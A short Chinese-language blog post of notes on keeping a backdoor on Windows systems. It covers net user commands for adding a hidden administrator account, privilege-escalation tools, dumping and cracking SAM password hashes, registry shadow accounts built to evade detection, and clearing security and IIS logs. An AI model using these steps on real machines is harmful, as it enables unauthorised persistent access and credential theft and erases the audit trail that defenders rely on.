2020-02-15

windows留后門思路及方法

管理用戶命令

net user 查看有哪些用戶
net user administator 顯示用戶信息
net user hacker 123 /add 添加hacker賬號,并設(shè)密碼為123(密碼科省略)
net user hacker abc 將hacker的密碼改為abc
net user hacker /del 刪除hacker用戶
net user hacker /active:no 禁用hacker用戶

管理本地組命令

net localgroup administrators 顯示管理組中所有成員
net localgroup administators hacker /add 將hacker用戶添加到administrators用戶組中
net localgroup administrator hacker /del 將hacker從administrators用戶組中刪除

查看當(dāng)前用戶是誰

windows用 whoami,whoami /all則可以看到sid和rid的值。
kali獲得shell后用getuid

windows提權(quán)工具

Churrasco.exe
pr.exe

windows留后門思路

第一種:
創(chuàng)建一個(gè)賬號(名字取個(gè)便于隱藏的),將其添加到administrators用戶組中,就獲得了最高管理員的權(quán)限。
第二種:
破解原administrator賬號密碼

SAM數(shù)據(jù)庫
c:\windows\system32\config\SAM
win7之前的系統(tǒng)采用LM-HASH加密,win7之后的采用NTLM-HASH加密
獲取hash密碼軟件 QUARKS PwDump;
破解hash密碼 http://www.objectif-securite.ch/en/ophcrack.php

第三種:
建立隱藏賬號
(一)建立簡單隱藏賬號:在用戶名后面加符號,如: "hack"
注:簡單隱藏賬號在字符界面下net user無法查看,但在圖形界面的"本地用戶和組"中能看到
(二)建立完全隱藏賬號(影子賬號)
通過導(dǎo)入注冊表的方式創(chuàng)建賬號。具體步驟百度。
注:1.這樣創(chuàng)建的用戶,登錄后不會(huì)再C:\Documens and Settings中創(chuàng)建用戶配置文件夾,而留下創(chuàng)建登錄痕跡。2.這種只能查注冊表才能發(fā)現(xiàn)。也可用相應(yīng)的工具,如"本地管理員檢查工具"

清理系統(tǒng)日志

elsave工具 清理日志 elsave.exe -l security -C 清楚所有日志
cleanIISLog 清楚指定ip的日志

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 情人節(jié)快樂! PPT學(xué)習(xí)的小確幸!講真,PPT一直是我的一個(gè)梗,學(xué)的時(shí)候就沒太用心練習(xí),踐行的課程很多,加上重心更...
    b16e64aae034閱讀 71評論 0 1
  • 心態(tài)已崩 GOOD NIGHT 剛剛,好不容易在簡書注冊完賬號,還沒有怎么搞明白,老母親的奪命吼就...
    大花Momda閱讀 104評論 0 0
  • 這個(gè)期盼已久的周三終于到了,有興奮,有激動(dòng),又有點(diǎn)忐忑,因?yàn)榻裉煳覀兦嘟酚?jì)劃要公布我們今年最幸運(yùn)的錦鯉,我們吳紅校...
    拜泉1243孟令賀閱讀 448評論 1 7
  • 文/驚蟄七七 01 晚上十點(diǎn),電話響了,是安安打來的。她在這個(gè)時(shí)候打來,我就知道她又心情不好,睡不著了。 果然,她...
    驚蟄七七閱讀 5,488評論 2 9

友情鏈接更多精彩內(nèi)容